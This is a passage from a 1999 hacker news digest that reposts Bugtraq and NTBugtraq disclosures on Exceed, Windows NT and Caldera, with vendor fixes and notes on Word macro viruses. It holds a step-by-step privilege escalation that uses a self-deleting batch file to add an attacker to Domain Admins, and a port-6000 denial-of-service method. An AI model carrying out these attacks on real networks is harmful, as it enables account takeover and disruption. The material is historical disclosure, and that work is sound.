Copyright © 1999 Reuters Limited. All rights reserved. @HWA 38.0 NT-Exceed DoS ~~~~~~~~~~~~~ Date: Tue, 27 Apr 1999 13:29:26 -0700 From: "LaFournaise, Chris J." To: BUGTRAQ@netspace.org Subject: NT/Exceed D.O.S. This is regarding Hummingbird's Exceed X emulator v5 (and possibly v6) running on Windows NT. I haven't tested Win95/98. The Exceed X server allows inbound TCP connections on port 6000 from the XDM host. If someone uses telnet from the XDM host to connect to a PC running Exceed on port 6000 and enters any garbage text, the X server will hang and the Exceed session is frozen for good. I have notified Hummingbird via their tech support web site but have not received a response yet. Chris LaFournaise cjlafournaise@escocorp.com ---------------------------------------------------------------------------- Date: Wed, 28 Apr 1999 23:34:26 +0100 From: Steve To: BUGTRAQ@netspace.org Subject: Re: NT/Exceed D.O.S. > This is regarding Hummingbird's Exceed X emulator v5 (and possibly v6) > running on Windows NT. I haven't tested Win95/98. > > The Exceed X server allows inbound TCP connections on port 6000 from the XDM > host. If someone uses telnet from the XDM host to connect to a PC running > Exceed on port 6000 and enters any garbage text, the X server will hang and > the Exceed session is frozen for good. As far as I know, a variation of that bug has been present in all versions >from the early Exceed for MS-Dos onwards. I stumbled on it 5 years ago when I was a student, so I didn't know whether it was a configuration error or a bug. I don't think I managed to permanently freeze the connection then, but it was certainly possible to freeze it for as long as you left the telnet connection to port 6000 open. If I remember correctly, it didn't use to be just the XDM host that could make the connection, you could freeze Exceed >from any host. I guess that would depend on the setting of the 'Host Access Control List' field. For the record, I've just tested Exceed v6 under Windows 98 and it still has the same effect. I also tested setting Exceed to only allow a given machine to connect, and I can still freeze it by telnetting from another machine in another subnet... I didn't manage to freeze it beyond the telnet session to port 6000 though. Steve. ---------------------------------------------------------------------------- Date: Thu, 29 Apr 1999 09:23:11 -0600 From: Max Norris To: BUGTRAQ@netspace.org Subject: Re: NT/Exceed D.O.S. I wasn't able to duplicate a mini-DOS running eXceed 6.0.2.0 on NT 4.0 SP4. Steps: On NT machine, opened xterm session Went to box that I just opened the session with, type in TELNET 6000 The eXceed program hung for about 2 minutes as the host tried to connect to it, but everything else still worked in NT. After attempting to connect, it will say it is connected for about 2 seconds and then states "Connection closed by foreign host". After that the eXceed session resumed and I was able to close out gracefully. Max Norris pedhrm.mnorris@state.ut.us >>> "LaFournaise, Chris J." 04/27 2:29 PM >>> This is regarding Hummingbird's Exceed X emulator v5 (and possibly v6) running on Windows NT. I haven't tested Win95/98. The Exceed X server allows inbound TCP connections on port 6000 from the XDM host. If someone uses telnet from the XDM host to connect to a PC running Exceed on port 6000 and enters any garbage text, the X server will hang and the Exceed session is frozen for good. I have notified Hummingbird via their tech support web site but have not received a response yet. Chris LaFournaise cjlafournaise@escocorp.com ---------------------------------------------------------------------------- Date: Wed, 28 Apr 1999 17:39:00 -0700 From: Ian Westcott To: BUGTRAQ@netspace.org Subject: Re: NT/Exceed D.O.S. On Tue, Apr 27, 1999 at 01:29:26PM -0700, LaFournaise, Chris J. wrote: > This is regarding Hummingbird's Exceed X emulator v5 (and possibly v6) > running on Windows NT. I haven't tested Win95/98. > > The Exceed X server allows inbound TCP connections on port 6000 from the XDM > host. If someone uses telnet from the XDM host to connect to a PC running > Exceed on port 6000 and enters any garbage text, the X server will hang and > the Exceed session is frozen for good. I just tested Exceed v6.0 under Win95, and it is vulnerable. -- Ian Westcott | Fly away to a Rainbow in the sky. ijwestcott@ucdavis.edu | Gold is at the end for each of us to find. -==(UDIC)==- | There the road begins where another one will end. Rakarra@FurryMUCK, IRC | Here the four winds know, Dragon Code: DC.D f+ | Who will break and who will bend. s- h- Cgold>Red a $ | All to be the Master of the Wind. ---------------------------------------------------------------------------- Date: Wed, 28 Apr 1999 13:57:51 -0700 From: Matt Wilbur To: BUGTRAQ@netspace.org Subject: Re: NT/Exceed D.O.S. Exceed (an X server, not an X emulator) version 6.0.1.0 on NT appears to have fixed this problem, somewhat... Telnetting to port 6000 locks the server up for 20-30 seconds, but it recovers eventually. Not surprisingly, using netcat has the same effect... although, contrary to Chris's findings with Exceed 5, I didn't need to send any garbage characters, the connection alone did the job. Also, it works >from any host, not just the one the xdm session had been initiated with, regardless of host access settings in Xconfig, Exceeds "configuration" tool. I'd still consider this DoS-bait, when you imagine a one-liner to continuously connect to port 6000 of your favorite Exceed user's machine. Matt Wilbur [snip] > > This is regarding Hummingbird's Exceed X emulator v5 (and possibly v6) > running on Windows NT. I haven't tested Win95/98. > > The Exceed X server allows inbound TCP connections on port > 6000 from the XDM> host. If someone uses telnet from the XDM host to connect to > a PC running Exceed on port 6000 and enters any garbage text, the X server > will hang and the Exceed session is frozen for good. > > I have notified Hummingbird via their tech support web site > but have not received a response yet. > > Chris LaFournaise > cjlafournaise@escocorp.com > ---------------------------------------------------------------------------- Date: Thu, 29 Apr 1999 11:54:14 -0700 From: Jamie Lawrence To: BUGTRAQ@netspace.org Subject: Re: NT/Exceed D.O.S. I couldn't reproduce either effect with Exceed 6.1 under NTsp3. Everything behaved normally, both for new and existing sessions. -j @HWA 39.0 NT4 Trojaned Profiles ~~~~~~~~~~~~~~~~~~~~~ Date: Wed, 28 Apr 1999 20:36:58 +0100 From: Mnemonix To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: NT Security Advisory: Domain user to Domain Admin - Profiles and the Registry Problem : NT users can cause other users of the system to load a "trojaned" profile that could lead to a system compromise. This issue has been here for as long as NT 4 has, but I'm not sure if anybody has picked this particular issue up. Details: When a user logs onto an NT Workstation or Server a new subkey is written to the HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList registry key. The name of this new key is that of the user's Security Identifier or SID. One of the values of this key is the ProfileImagePath which points to the location of the user's profile directory. This can reference a local path (eg %systemroot%\profiles\acc_name) or a UNC path (eg \\PDC\profiles\acc_name). By default, the permissions on the ProfileList registry key grants the Everybody group the SetValue permission meaning that any user including guests may edit the information in this subkey and all of its subkeys. Consequently a malicious user of the system could change another user's ProfileImagePath and get it to load a different profile (eg c:\trojaned-profile) that contains entries in the Start Up folder that will run when that user next logs on to that system. Editing these Registry keys can be done local or from across the network. Although remote access to the registry can be controlled by placing controls on the winreg key, the HKLM\Software\Microsoft\Windows NT\CurrentVersion path into the Registry is, by default, an AllowedPath, meaning that, irrespective of the ACLs set on the winreg key, a remote user may edit any subkey under the CurrentVersion key. Note that tools such as Regedit.exe and Regedt32.exe will not be able to be used to to this. The NT Resource Kit's reg.exe could though because it opens a handle straight to the Registry key in question. Attack Scenario: This weakness of default settings, could allow a normal domain user to gain domain Administrative rights: Assuming the attackers machine is called \\DODGY and the PDC is called \\PDC , the user jsmith at \\DODGY creates a new directory on the root of their C: drive and call it "profile" and copy into it the contents of their own profile and then make some changes like creating a batch file called addme.bat with the following contents: net groups "Domain Admins" jsmith /add del "\\DODGY\C$\profile\start menu\programs\startup\addme.bat" Once they have logged onto the domain they use reg.exe to open the Administrator's ProfileList key. This is easily found as it is the SID with a RID of 500. They then edit the ProfileImagePath to point to \\DODGY\C$\profile . Next time the Administrator logs on at the \\PDC console their profile will be loaded from \\DODGY (because Domain Admins are members of the local Administrators group they can map to the administrative share on \\DODGY ) and the self deleteing batch file in the StartUp wil be run adding jsmith to the Domain Admins group. This whole process can be cleaned up somewhat as in most cases it would be fairly obvious that something is not as it should be to the Administrator when they log on. Resolution: The winlogon.exe process actually creates the new subkey when a user logs on - and the key is _not_ created in the security context of the user currently logging on but rather the SYSTEM account. Only the SYSTEM account, then, needs write access to the ProfileList key and Everyone else should be given only Read Access. Doing this will not prevent new users from logging on and they "SID" subkey is still created. NB:- This issue can also allow users to bypass mandatory profiles etc, etc. Cheers, David Litchfield http://www.infowar.co.uk/mnemonix http://www.arca.com/ ------------------------------------------------------------------------------------------- Date: Thu, 29 Apr 1999 09:58:35 -0700 From: Paul Leach To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Re: NT Security Advisory: Domain user to Domain Admin - Profiles and the Registry > -----Original Message----- > From: Mnemonix [mailto:mnemonix@GLOBALNET.CO.UK] > Sent: Wednesday, April 28, 1999 12:37 PM > To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM > Subject: NT Security Advisory: Domain user to Domain Admin - Profiles > and the Registry > > > Problem : NT users can cause other users of the system to > load a "trojaned" profile that could lead to a system > compromise. This issue has been here for as long as NT 4 has, > but I'm not sure if anybody has picked this particular issue up. Yes, they have. The "Securing Windows NT" Whitepaper from the www.microsoft.com (just use the search capabiltiy for exactly the phrase in quotes) already notes that you must ACL the ProfileList key as you suggest. Paul ------------------------------------------------------------------------------------------- Date: Thu, 29 Apr 1999 11:44:18 -0700 From: Paul Leach To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Re: NT Security Advisory: Domain user to Domain Admin - Profiles and the Registry > -----Original Message----- > From: Paul Leach [mailto:paulle@MICROSOFT.COM] > Sent: Thursday, April 29, 1999 9:59 AM > To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM > Subject: Re: NT Security Advisory: Domain user to Domain Admin - > Profiles and the Registry > > > > -----Original Message----- > > From: Mnemonix [mailto:mnemonix@GLOBALNET.CO.UK] > > Sent: Wednesday, April 28, 1999 12:37 PM > > To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM > > Subject: NT Security Advisory: Domain user to Domain Admin > - Profiles > > and the Registry > > > > > > Problem : NT users can cause other users of the system to > > load a "trojaned" profile that could lead to a system > > compromise. This issue has been here for as long as NT 4 has, > > but I'm not sure if anybody has picked this particular issue up. > > Yes, they have. > > The "Securing Windows NT" Whitepaper from the > www.microsoft.com (just use > the search capabiltiy for exactly the phrase in quotes) > already notes that > you must ACL the ProfileList key as you suggest. I had mistemembered that the above search got exactly one hit -- instead, it was the first hit on the list. The precise URL is http://www.microsoft.com/NTServer/security/exec/overview/Secure_NTInstall.as p Also, the SCE templates included with SP4 were designed to help automate the application of the recommendations in the White Paper. So if you want to make the fix to the ACL on Profile list, I'd suggest looking into them. Paul ------------------------------------------------------------------------------------------- Date: Thu, 29 Apr 1999 11:31:23 -0700 From: David LeBlanc To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Re: NT Security Advisory: Domain user to Domain Admin - Profiles and the Registry > From: Mnemonix [mailto:mnemonix@GLOBALNET.CO.UK] > Problem : NT users can cause other users of the system to > load a "trojaned" profile that could lead to a system > compromise. This issue has been here for as long as NT 4 has, > but I'm not sure if anybody has picked this particular issue up. I think you should search the archives on my name with ProfileList as a key, and that you will find a number of references. Dominique, Paul Leach and I had an extended discussion on that topic in this list nearly a year ago. > By default, the permissions on the ProfileList registry key > grants the Everybody group the SetValue permission If I'm not mistaken, only the system account ever accesses this key. At least that's what I found when auditing this tree several months ago. > Consequently a malicious > user of the system could change another user's > ProfileImagePath and get it to load a different profile (eg > c:\trojaned-profile) that contains entries in the Start Up > folder that will run when that user next logs on to that system. If we're going to start worrying about this one, this is just one of many modifications that need to be made. The best collection of resources in this area remains (IMHO) Steve Sutton's NSA paper at www.trustedsystems.com > Editing these Registry keys can be done local or from across > the network. This is only true of the server. A currently patched workstation requires admin access to open this portion of the registry across the network. However, to actually _trojan_ someone, you also must have the ability to insert new profiles under %systemroot%\Profiles, which is typically NOT available on a server. A good solution for a server would be to make the permissions on the parent key admins, system, and server ops. If the group of users who you expect to be logging on at the console of a server were more diverse, then I would recommend creating a group for just that purpose and setting the permissions to admins, system, and the group you established. So unless you're worried about a workstation with serial users, it turns out that the complete requirements to really carry out an attack are seldom met. > Once they have logged onto the domain they use reg.exe to > open the Administrator's ProfileList key. This is easily > found as it is the SID with a RID of 500. They then edit the > ProfileImagePath to point to \\DODGY\C$\profile . I would suggest that you actually try your scenarios. I have tried this, and it doesn't work. The admin will get the profile for the default user. The same is true if you try to point the profile anywhere else than %systemroot%profiles. > Resolution: The winlogon.exe process actually creates the new > subkey when a user logs on - and the key is _not_ created in > the security context of the user currently logging on but > rather the SYSTEM account. Only the SYSTEM account, then, > needs write access to the ProfileList key and Everyone else > should be given only Read Access. Doing this will not prevent > new users from logging on and they "SID" subkey is still created. I recommended doing this some months ago. It is still not completely clear that this won't break something somewhere. As always, people should try this in their own systems and be sure something doesn't break. Another way to go at this one would be to put an app or script in the default user's startup group that would set the permissions to admins, system and that user. I believe supercacls (also from Steve Sutton) could be used to do this. ------------------------------------------------------------------------------------------- Date: Thu, 29 Apr 1999 12:31:21 -0700 From: Paul Leach To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Re: NT Security Advisory: Domain user to Domain Admin - Profiles and the Registry > -----Original Message----- > From: dan koons [mailto:dkoons@secured.net] > Sent: Thursday, April 29, 1999 11:52 AM > To: Paul Leach > Cc: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM > Subject: Re: NT Security Advisory: Domain user to Domain Admin - > Profiles and the Registry > > strange. i just followed your explicit instructions, grabbed > the first > file that turned up (which was called "securing windows nt > installation" > and was dated october 23, 1997) and searched it for the string > 'ProfileList' and was unable to find any matches. Here's a relevant section of the text, cut and paste from the doc: Protecting the Registry In addition to the considerations for standard security, the administrator of a high-security installation might want to set protections on certain keys in the registry. By default, protections are set on the various components of the registry that allow work to be done while providing standard-level security. For high-level security, you might want to assign access rights to specific registry keys. This should be done with caution, because programs that the users require to do their jobs often need to access certain keys on the users' behalf. For more information, see Chapter 24, "Registry Editor and Registry Administration." For each of the keys listed below, make the following change: Access allowed Everyone Group QueryValue, Enumerate Subkeys, Notify and Read Control In the HKEY_LOCAL_MACHINE on Local Machine dialog: \Software This change is recommended. It locks the system in terms of who can install software. Note that it is not recommended that the entire subtree be locked using this setting because that can render certain software unusable. \Software\Microsoft\RPC (and its subkeys) This locks the RPC services. \Software\Microsoft\Windows NT\ CurrentVersion \Software\Microsoft\Windows NT\ CurrentVersion\Profile List \Software\Microsoft\Windows NT\ CurrentVersion\AeDebug \Software\Microsoft\Windows NT\ CurrentVersion\Compatibility So it appears that there's a space in the spelling in the document. In the registry, there's no space. I'll report the bug. Perhaps all the clones of the document you cited also copied the spelling error :-) Paul ------------------------------------------------------------------------------------------- Date: Thu, 29 Apr 1999 12:00:56 -0700 From: dan koons To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Re: NT Security Advisory: Domain user to Domain Admin - Profiles and the Registry On Thu, 29 Apr 1999, dan koons wrote: > further, in the "windows nt security guidelines" developed for nsa > research (found at http://www.trustedsystems.com/NSAGuide.htm), the united > states department of energy's "windows nt security advisor" (at > http://doe-is.llnl.gov/SecRes/CustomTools/secadvisor.pdf), the united > states navy's "navy secure windows nt 4.0 installation and configuration > guide" (at http://infosec.navy.mil/COMPUSEC/ntsecure.html), and the > "hardening of windows nt 4.0" (at > http://pw2.netcom.com/~honeyluv/index.html), a search for the string > 'ProfileList' also does not yield any results. oops; my mistake. the navy guide DOES recommend setting the 'ProfileList' key to 'read' for 'Authenticated Users'. but i could not find any reference to the key in any of the other documents. dan _____________________________________________________________________ daniel e koons dkoons@secured.net _____________________________________________________________________ ------------------------------------------------------------------------------------------- Date: Thu, 29 Apr 1999 13:35:36 -0700 From: Paul Leach To: BUGTRAQ@netspace.org Subject: Re: NT Security Advisory: Domain user to Domain Admin - Profiles and the Registry -----Original Message----- >From: Mnemonix [mailto:mnemonix@GLOBALNET.CO.UK] Sent: Wednesday, April 28, 1999 12:37 PM To: BUGTRAQ@NETSPACE.ORG Subject: NT Security Advisory: Domain user to Domain Admin - Profiles and the Registry Problem : NT users can cause other users of the system to load a "trojaned" profile that could lead to a system compromise. This issue has been here for as long as NT 4 has, but I'm not sure if anybody has picked this particular issue up. Details: When a user logs onto an NT Workstation or Server a new subkey is written to the HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList registry key. The name of this new key is that of the user's Security Identifier or SID. One of the values of this key is the ProfileImagePath which points to the location of the user's profile directory. This can reference a local path (eg %systemroot%\profiles\acc_name) or a UNC path (eg \\PDC\profiles\acc_name). This is indeed an issue. It is documented in the "Securing Windows NT" whitepaper, http://www.microsoft.com/NTServer/security/exec/overview/Secure_NTInstall.as p and anyone who has implemented those recommendations will be safe against this vulnerability. (NB: The registry key is misspelled "Profile List" in the document.) Also, the SCE templates in SP4/SP5 included one designed to help automate the recommendatiaons in the whitepaper -- securws4.inf, IIRC. However, we just examined it and it allows "Power Users" (abbreviated "PU") to write the key. It'll be fixed in SP6. In the meantime, one can hand edit the entry for ProfileList in the template. Find the line that looks like this: "MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList",2,"D:P(A;CI;GR;;;AU)(A;CI;GA;;;DA)(A;CI;GA;;; SY)(A;CI;GA;;;CO)(A;CI;GRGW;;;PU)" and get rid of the "(A;CI;GRGW;;;PU)" at the end. Paul ------------------------------------------------------------------------------------------- Date: Thu, 29 Apr 1999 13:53:05 -0700 From: Paul Leach To: BUGTRAQ@netspace.org Subject: Security Configuration Editor info Since I said that SCE could be used to fix the ProfileList bug that Mnemonix reported, I got a private request asking where more information about SCE (Security Configuration Editor) could be found -- they'd tried the usual places. I think they changed the name since SP4 to "Security Configuration Manager", but I called it SCE becaue most people know it by the old name, since that's what it was called in SP4. I did a search on that exact phrase at www.microsoft.com and got a lot of hits, the first one was http://www.microsoft.com/NTServer/security/techdetails/prodarch/securconfig. asp which looks pretty good. In general, a good place to look for security info on MS products is http://www.microsoft.com/security/Resources/whitepapers.as p Paul @HWA 40.0 Microsoft is a virus, oh sorry I mean new microsoft virus problem... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml microsoft.virus.txt - Microsoft yet again releases virus infected MS Word documents on their own web site! If you have visited http://www.microsoft.com/uk/business_technology/dns/ecommerce/financial/case.htm recently to find out more about MS Exchange and E-commerce, then you should scan for the W97M/Marker.C virus on your network. This has happened numerous times, and Microsoft STILL cannot manage to check documents for viruses before releasing them on their web site. Thanks a fucking lot, Microsoft! Date: Sun, 25 Apr 1999 13:13:34 +0100 >From: T Bruce Tober Subject: You'd think they'd know better... ...or maybe not. I mean, it is Microcrap we're talking about here, viz this article from Woody's (Woody's Office Watch), and if there's anyone more pro-Microsoft it's only Bill G himself,: (Read the complete story http://www.wopr.com/ ) TRUST NO ONE [...] Microsoft has in the past released virus infected documents on their web site and by other means. WOW has had to publish warnings several times. Sadly it's happened again. Anyone visiting http://www.microsoft.com/uk/business_technology/dns/ecommerce/financial/case.htm to find out more about MS Exchange and E-commerce got more than they bargained for when they downloaded any of the case study documents. All were infected with W97M/Marker.C virus! Apparently no-one at Microsoft checked the documents before making them publicly available [...] Bruce Tober, , Birmingham, UK, EU +44-121-242-3832 soon at RISKS-LIST: Risks-Forum Digest Weds 28 April 1999 Volume 20 : Issue 34 @HWA 41.0 Some new viruses from http://www.wopr.com/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ DMV, Hot, FormatC, Wiederoffnen DMV DMV is probably the first Word macro virus to have been written. It is test virus, written by a person called Joel McNamara to study the behavior of macro viruses. As such, it is no threat - it announces its presence in the system, and keeps the user informed of its actions. McNamara wrote DMV in the fall of 1994 - at the same time, he published a detailed study about macro viruses. He kept his test virus under wraps until a real macro virus, Concept, was discovered. At that time, he decided to make DMV known to the public. We can expect to see new variants of the DMV virus, as well as totally new viruses inspired by the techniques used in this virus. McNamara also published a skeleton for a virus to infect Microsoft Excel spreadsheet files. Hot Hot was the first Word macro virus written in Russia. It was found in the wild over there in January 1996. It spreads in a similar manner as the Concept virus: when an infected DOC is first opened, the virus modifies the NORMAL.DOT file, and will spread to other documents after that. Unlike the earlier Word macro viruses, Hot does not replicate with the File/Save As command - it infects only during the basic File/Save command. This means that Hot will infect only existing documents in the system - not new ones. Infected documents contain the following four macros, which are visible in the macro list: AutoOpen DrawBringInFrOut InsertPBreak ToolsRepaginate When Hot infects NORMAL.DOT, it renames these macros to: StartOfDoc AutoOpen InsertPageBreak FileSave Macros are saved with the 'execute-only' feature, which means that a user can't view or edit them. Hot contains a counter. It adds a line like this to the WINWORD6.INI file: QLHot=35112 This number is based on the number of days in this century. Hot adds 14 to this number and then waits until this latency time of 14 days has passed. Hot will spread normally during this time, it will just not activate. After the 14 day pause, there is a 1 in 7 chance that a document will be erased when it is opened. The Virus will delete all text and re-save the document. Hot does not do this, if it find a file called EGA5.CPI from the C:\DOS directory. A comment in the source code of the virus hints that this feature is added so that the author of the virus and his friends can protect themselves from the activation damage: '--------------------------------------------------------------- '- Main danger section: if TodayNo=(QLHotDateNo + RndDateNo) --- '- and if File C:DOSega5.cpi not exist (not for OUR friends) - '--------------------------------------------------------------- By default, there is no file by the name EGA5.CPI in MS-DOS distributions. Hot was the first macro virus to use external functions. This system allows Word macros to call any standard Windows API call. The use of external functions specific to Windows 3.1x means that Hot will be unable to spread under Word for Macintosh or Word 7 for Windows 95: opening an infected document will just produce an error message. FormatC This is not a virus, but a trojan because it does not replicate. It does, however, format your C: drive as soon as the document is opened. This trojan was posted to a Usenet newsgroup. Wiederoffnen Wiederoffnen is not a virus, but a Word macro trojan. It comes in a Microsoft Word 2 document but works perfectly under Word 6 too. Wiederoffnen intercepts the AutoClose macro and when the document is closed plays tricks with AUTOEXEC.BAT. @HWA 42.0 Caldera COAS may leave shadowed password file readable... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Tue, 27 Apr 1999 20:26:16 -0600 From: synapse To: BUGTRAQ@netspace.org Subject: Caldera Advisory Heya Aleph, Not sure if this had come accross the list. -----BEGIN PGP SIGNED MESSAGE----- ______________________________________________________________________________ Caldera Systems, Inc. Security Advisory Subject: COAS Advisory number: CSSA-1999:009.0 Issue date: 1999 04 27 Cross reference: ______________________________________________________________________________ 1. Problem Description /etc/shadow may get world readable 2. Vulnerable Versions Systems: OpenLinux 2.2. Packages: previous to coas-1.0-8 3. Solutions The proper solution is to upgrade to the coas-1.0-8 package. If /etc/shadow is world-readable, this is fixed with chmod 600 /etc/shadow 4. Location of Fixed Packages The upgrade packages can be found on Caldera's FTP site at: ftp://ftp.calderasystems.com/pub/OpenLinux/updates/2.2/current/RPMS/ The corresponding source code package can be found at: ftp://ftp.calderaystems.com/pub/OpenLinux/updates/2.2/current/SRPMS 5. Installing Fixed Packages Upgrade the affected packages with the following commands: rpm -q coas && rpm -U coas-1.0-8.i386.rpm 6. Verification The MD5 checksums (from the "md5sum" command) for these packages are: 1efa8cde40f5684293e03c2499f2f59f README b3fa473f6ba574052991bf2254bd378d RPMS/coas-1.0-8.i386.rpm 3bfa00aa3230f97537e8baa2c0454d08 SRPMS/coas-1.0-8.src.rpm 7. References This and other Caldera security resources are located at: http://www.calderasystems.com/news/security/index.html Additional documentation on this problem can be found in: This security fix closes Caldera's internal Problem Report 4544. 8. Disclaimer Caldera Systems, Inc. is not responsible for the misuse of any of the information we provide on this website and/or through our security advisories. Our advisories are a service to our customers intended to promote secure installation and use of Caldera OpenLinux. ______________________________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBNyW4/+n+9R4958LpAQHntgP/cHhIOaKUPRfeBOtMQP7lZ2NQlEPrqzkq cu/Q9IvIqrvm/mFikznaMTdehz0Jql2NuY2Zjs0MUdF0Rm7KsgBQ6BYX+10GAE2W HAZIuYQ2zeM2acGcrvzGYExkKmrLOfhD77V9l7rZ9WieQO7B8vmj5N4nGdkUNz2U j+AigG8FJNI= =O2I/ -----END PGP SIGNATURE----- @HWA 43.0 NT4+SP4 filename length vulnerabilty ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Bug in WinNT 4.0 SP4 Alvaro Gilabert (agilabert@RIBA.ES) Mon, 19 Apr 1999 15:15:36 +-200 Hi, I supose it is a bug and I will explain why do I think so You can exceed the limit in the number of chars allowed in a filename. WinNT does allow it. You can move a folder to a deeper one exceeding it. But, when you try to backup that folder, the backup program (BackupExec and WinNT Backup) crashes and reboots the server. If you try to backup thru a network drive (using another server and mapping that folder), then it crashes and reboot the server also. Not the server that is making the backup but the server that has the wrong folder. That's a but because WinNT, supposing to be a fileserver, should take care of this. Recently, Mindspring released a report comparing WinNT vs. RedHat, sponsored by Microsoft. This point was missed in the comparison. Alvaro Gilabert ICQ UIN 2316344 ----------------------------------------------------------------- Re: Bug in WinNT 4.0 SP4 David LeBlanc (dleblanc@MINDSPRING.COM) Tue, 20 Apr 1999 07:12:23 -0700 At 03:15 PM 4/19/99 +-200, Alvaro Gilabert wrote: >Hi, >I supose it is a bug and I will explain why do I think so >You can exceed the limit in the number of chars allowed in a filename. WinNT does allow it. You can move a folder to a deeper one exceeding it. That's because the limit isn't where you think it is. From the documentation on CreateFile in the SDK: Windows NT: You can use paths longer than MAX_PATH characters by calling the wide (W) version of CreateFile and prepending “\\?\” to the path. The “\\?\” tells the function to turn off path parsing. This lets you use paths that are nearly 32,000 Unicode characters long. You must use fully-qualified paths with this technique. This also works with UNC names. The “\\?\” is ignored as part of the path. For example, “\\?\C:\myworld\private” is seen as “C:\myworld\private”, and “\\?\UNC\tom_1\hotstuff\coolapps” is seen as “\\tom_1\hotstuff\coolapps”. =============================== So it seems that if you use the APIs properly, you can deal with extremely long paths. When you move things around, it is very likely that you are dealing with relative names, not absolute names. David LeBlanc dleblanc@mindspring.com ----------------------------------------------------------------- Re: Bug in WinNT 4.0 SP4 Paul Gracy (paul.gracy@COMPGEN.COM) Mon, 26 Apr 1999 16:36:11 -0400 I must disagree. Any action that a program takes that can crash a server is a bug. Period. The fact that properly using the SDK and following all the 'rules of microsoft' would prevent the crash is not an excuse. When the application tries to do something that would cause a crash, the OS should whack the offender's knuckles (see Dr. Watson), not curl up and die. I am tired of bad code being given excuses. If MS wants to run large, mission-critical / business-critical systems, they should fix their code. IMHO. ========================= Paul H. Gracy paul.gracy@compgen.com phone: 404 705 2873 #include ========================= > -----Original Message----- > From: David LeBlanc [SMTP:dleblanc@MINDSPRING.COM] > Sent: Tuesday, April 20, 1999 10:12 AM > To: BUGTRAQ@netspace.org > Subject: Re: Bug in WinNT 4.0 SP4 > > At 03:15 PM 4/19/99 +-200, Alvaro Gilabert wrote: > >Hi, > >I supose it is a bug and I will explain why do I think so > >You can exceed the limit in the number of chars allowed in a filename. > WinNT does allow it. You can move a folder to a deeper one exceeding it. > > That's because the limit isn't where you think it is. From the > documentation on CreateFile in the SDK: > > Windows NT: You can use paths longer than MAX_PATH characters by calling > the wide (W) version of CreateFile and prepending "\\?\" to the path. The > "\\?\" tells the function to turn off path parsing. This lets you use > paths > that are nearly 32,000 Unicode characters long. You must use > fully-qualified paths with this technique. This also works with UNC names. > The "\\?\" is ignored as part of the path. For example, > "\\?\C:\myworld\private" is seen as "C:\myworld\private", and > "\\?\UNC\tom_1\hotstuff\coolapps" is seen as "\\tom_1\hotstuff\coolapps". > =============================== > > So it seems that if you use the APIs properly, you can deal with extremely > long paths. When you move things around, it is very likely that you are > dealing with relative names, not absolute names. > > > David LeBlanc > dleblanc@mindspring.com ----------------------------------------------------------------- Re: Bug in WinNT 4.0 SP4 David LeBlanc (dleblanc@MINDSPRING.COM) Tue, 27 Apr 1999 13:13:54 -0700 At 04:36 PM 4/26/99 -0400, Paul Gracy wrote: >I must disagree. Any action that a program takes that can crash a server is >a bug. Period. I did not say it wasn't a bug. A bug, by definition, is something that causes an application (or even the whole OS) to crash or otherwise malfunction. So you are not disagreeing with anything I _said_. If you can make something go splat, then it is a bug. No arguments there. >The fact that properly using the SDK and following all the 'rules of >microsoft' would prevent the crash is not an excuse. No excuses were being made. Please do not manufacture excuses when they are not present. The only point was that Alvaro seemed to think that it was a problem that moving a folder could result in a total path which is > MAX_PATH. So far as I know, this isn't a problem, since if you are correctly handling the open, you can deal with extremely long paths. I thought that others might have the same sort of issue, and also thought that few people would know that bit of arcane trivia, so I was trying to point out how you might deal with this correctly. In general, using API calls correctly, and knowing various bits of trivia from the documentation is a Good Thing, and perhaps might save others from having their app go down. I was NOT saying that crashing is not a bug. That would be ridiculous. Neither the little backup app that comes with NT, or the Seagate product (which as far as I know, both sprung from Arcada, which Seagate bought) are favorites of mine. And before anyone asks, I really don't have something I can recommend. David LeBlanc dleblanc@mindspring.com ----------------------------------------------------------------- Date: Tue, 27 Apr 1999 21:03:52 +0200 From: tschweikle@FIDUCIA.DE To: BUGTRAQ@netspace.org Subject: Antwort: Re: Bug in WinNT 4.0 SP4 David LeBlanc wrote: >At 03:15 PM 4/19/99 +-200, Alvaro Gilabert wrote: >>Hi, >>I supose it is a bug and I will explain why do I think so >>You can exceed the limit in the number of chars allowed in a filename. >WinNT does allow it. You can move a folder to a deeper one exceeding it. > >That's because the limit isn't where you think it is. From the >documentation on CreateFile in the SDK: > >Windows NT: You can use paths longer than MAX_PATH characters by calling >the wide (W) version of CreateFile and prepending *\\?\* to the path. The >*\\?\* tells the function to turn off path parsing. This lets you use paths >that are nearly 32,000 Unicode characters long. You must use >fully-qualified paths with this technique. This also works with UNC names. >The *\\?\* is ignored as part of the path. For example, >*\\?\C:\myworld\private* is seen as *C:\myworld\private*, and >*\\?\UNC\tom_1\hotstuff\coolapps* is seen as *\\tom_1\hotstuff\coolapps*. >=============================== > >So it seems that if you use the APIs properly, you can deal with extremely >long paths. When you move things around, it is very likely that you are >dealing with relative names, not absolute names. > > >David LeBlanc >dleblanc@mindspring.com While following this tread I tried it out. View seconds later my NT server rebooted. Trying to create a 'reboot-server-path' from a client - impossible. Seems as if such path must be created from server console. But what about a carefully designed program installabel on the server, using the wide variant to create directories - creating paths exceeding MAX_PATH then setting a share to such a program? WinNT crashes within this scenario, every time a client wants 